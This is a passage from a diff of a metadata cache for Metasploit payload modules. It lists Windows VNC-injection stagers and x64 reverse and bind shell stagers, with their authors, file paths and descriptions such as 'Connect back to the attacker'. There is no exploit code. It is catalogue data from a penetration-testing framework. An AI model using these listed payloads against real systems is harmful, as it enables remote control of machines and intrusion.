"windows/vncinject", - "stager_refname": "windows/bind_tcp_rc4" - }, - "payload_windows/vncinject/bind_tcp_uuid": { - "name": "VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)", - "fullname": "payload/windows/vncinject/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nListen for a connection with UUID Support (Windows x86)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/bind_tcp_uuid" - }, - "payload_windows/vncinject/find_tag": { - "name": "VNC Server (Reflective Injection), Find Tag Ordinal Stager", - "fullname": "payload/windows/vncinject/find_tag", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "skape " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nUse an established connection", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/findtag_ord.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/find_tag", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/findtag_ord" - }, - "payload_windows/vncinject/reverse_http": { - "name": "VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/vncinject/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP (Windows wininet)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_http" - }, - "payload_windows/vncinject/reverse_http_proxy_pstore": { - "name": "VNC Server (Reflective Injection), Reverse HTTP Stager Proxy", - "fullname": "payload/windows/vncinject/reverse_http_proxy_pstore", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_http_proxy_pstore", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_http_proxy_pstore" - }, - "payload_windows/vncinject/reverse_ipv6_tcp": { - "name": "VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)", - "fullname": "payload/windows/vncinject/reverse_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker over IPv6", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_ipv6_tcp" - }, - "payload_windows/vncinject/reverse_nonx_tcp": { - "name": "VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)", - "fullname": "payload/windows/vncinject/reverse_nonx_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "vlad902 " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker (No NX)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_nonx_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_nonx_tcp" - }, - "payload_windows/vncinject/reverse_ord_tcp": { - "name": "VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)", - "fullname": "payload/windows/vncinject/reverse_ord_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "spoonm " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_ord_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_ord_tcp" - }, - "payload_windows/vncinject/reverse_tcp": { - "name": "VNC Server (Reflective Injection), Reverse TCP Stager", - "fullname": "payload/windows/vncinject/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp" - }, - "payload_windows/vncinject/reverse_tcp_allports": { - "name": "VNC Server (Reflective Injection), Reverse All-Port TCP Stager", - "fullname": "payload/windows/vncinject/reverse_tcp_allports", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_tcp_allports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_allports" - }, - "payload_windows/vncinject/reverse_tcp_dns": { - "name": "VNC Server (Reflective Injection), Reverse TCP Stager (DNS)", - "fullname": "payload/windows/vncinject/reverse_tcp_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "RageLtMan" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_tcp_dns", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_dns" - }, - "payload_windows/vncinject/reverse_tcp_rc4": { - "name": "VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/vncinject/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_rc4" - }, - "payload_windows/vncinject/reverse_tcp_rc4_dns": { - "name": "VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", - "fullname": "payload/windows/vncinject/reverse_tcp_rc4_dns", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "skape ", - "mihi", - "RageLtMan" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_tcp_rc4_dns", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_rc4_dns" - }, - "payload_windows/vncinject/reverse_tcp_uuid": { - "name": "VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support", - "fullname": "payload/windows/vncinject/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "OJ Reeves" - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nConnect back to the attacker with UUID Support", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_tcp_uuid" - }, - "payload_windows/vncinject/reverse_winhttp": { - "name": "VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)", - "fullname": "payload/windows/vncinject/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "sf ", - "hdm ", - "Borja Merino " - ], - "description": "Inject a VNC Dll via a reflective loader (staged).\n\nTunnel communication over HTTP (Windows winhttp)", - "references": [ - "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", - "URL-https://github.com/rapid7/ReflectiveDLLInjection" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb", - "is_install_path": true, - "ref_name": "windows/vncinject/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/vncinject", - "stager_refname": "windows/reverse_winhttp" - }, - "payload_windows/x64/custom/bind_ipv6_tcp": { - "name": "Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", - "fullname": "payload/windows/x64/custom/bind_ipv6_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "sf " - ], - "description": "Custom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/bind_ipv6_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp" - }, - "payload_windows/x64/custom/bind_ipv6_tcp_uuid": { - "name": "Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support", - "fullname": "payload/windows/x64/custom/bind_ipv6_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/bind_ipv6_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" - }, - "payload_windows/x64/custom/bind_named_pipe": { - "name": "Windows shellcode stage, Windows x64 Bind Named Pipe Stager", - "fullname": "payload/windows/x64/custom/bind_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "UserExistsError" - ], - "description": "Custom shellcode stage.\n\nListen for a pipe connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/bind_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_named_pipe" - }, - "payload_windows/x64/custom/bind_tcp": { - "name": "Windows shellcode stage, Windows x64 Bind TCP Stager", - "fullname": "payload/windows/x64/custom/bind_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "sf " - ], - "description": "Custom shellcode stage.\n\nListen for a connection (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/bind_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp" - }, - "payload_windows/x64/custom/bind_tcp_rc4": { - "name": "Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/custom/bind_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/bind_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_rc4" - }, - "payload_windows/x64/custom/bind_tcp_uuid": { - "name": "Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/custom/bind_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nListen for a connection with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/bind_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/bind_tcp_uuid" - }, - "payload_windows/x64/custom/reverse_http": { - "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/x64/custom/reverse_http", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_http", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_http" - }, - "payload_windows/x64/custom/reverse_https": { - "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)", - "fullname": "payload/windows/x64/custom/reverse_https", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "agix", - "rwincey" - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 wininet)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_https", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_https" - }, - "payload_windows/x64/custom/reverse_named_pipe": { - "name": "Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager", - "fullname": "payload/windows/x64/custom/reverse_named_pipe", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker via a named pipe pivot", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_named_pipe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_named_pipe" - }, - "payload_windows/x64/custom/reverse_tcp": { - "name": "Windows shellcode stage, Windows x64 Reverse TCP Stager", - "fullname": "payload/windows/x64/custom/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "sf " - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp" - }, - "payload_windows/x64/custom/reverse_tcp_rc4": { - "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", - "fullname": "payload/windows/x64/custom/reverse_tcp_rc4", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "hdm ", - "skape ", - "sf ", - "mihi", - "max3raza", - "RageLtMan" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_tcp_rc4", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_rc4" - }, - "payload_windows/x64/custom/reverse_tcp_uuid": { - "name": "Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)", - "fullname": "payload/windows/x64/custom/reverse_tcp_uuid", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "sf ", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nConnect back to the attacker with UUID Support (Windows x64)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_tcp_uuid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_tcp_uuid" - }, - "payload_windows/x64/custom/reverse_winhttp": { - "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)", - "fullname": "payload/windows/x64/custom/reverse_winhttp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTP (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_winhttp.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_winhttp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttp" - }, - "payload_windows/x64/custom/reverse_winhttps": { - "name": "Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp)", - "fullname": "payload/windows/x64/custom/reverse_winhttps", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "bwatters-r7", - "OJ Reeves" - ], - "description": "Custom shellcode stage.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/reverse_winhttps.rb", - "is_install_path": true, - "ref_name": "windows/x64/custom/reverse_winhttps", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/custom", - "stager_refname": "windows/x64/reverse_winhttps" - }, - "payload_windows/x64/encrypted_shell/reverse_tcp": { - "name": "Windows Command Shell, Encrypted Reverse TCP Stager", - "fullname": "payload/windows/x64/encrypted_shell/reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Matt Graeber", - "Shelby Pace" - ], - "description": "Spawn a piped command shell (staged).\n\nConnect to MSF and read in stage", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": "2025-04-19 11:11:01 +0000", - "path": "/modules/payloads/stagers/windows/x64/encrypted_reverse_tcp.rb", - "is_install_path": true, - "ref_name": "windows/x64/encrypted_shell/reverse_tcp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "payload_type": 2, - "staged": true, - "stage_refname": "windows/x64/encrypted_shell", - "stager_refname": "windows/x64/encrypted_reverse_tcp" - }, - "payload_windows/x64/encrypted_shell_reverse_tcp": { - "name": "Windows Encrypted Reverse Shell", - "fullname": "payload/windows/x64/encrypted_shell_reverse_tcp", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "payload", - "author": [ - "Matt Graeber", - "Shelby Pace" - ], - "description": "Connect back to attacker and spawn an encrypted command shell", - "references": [], - "platform": "Windows", - "arch": "x64", - "rport": null, - "autofilter_ports": null, - "autofilter_services": null, - "targets": null, - "mod_time": 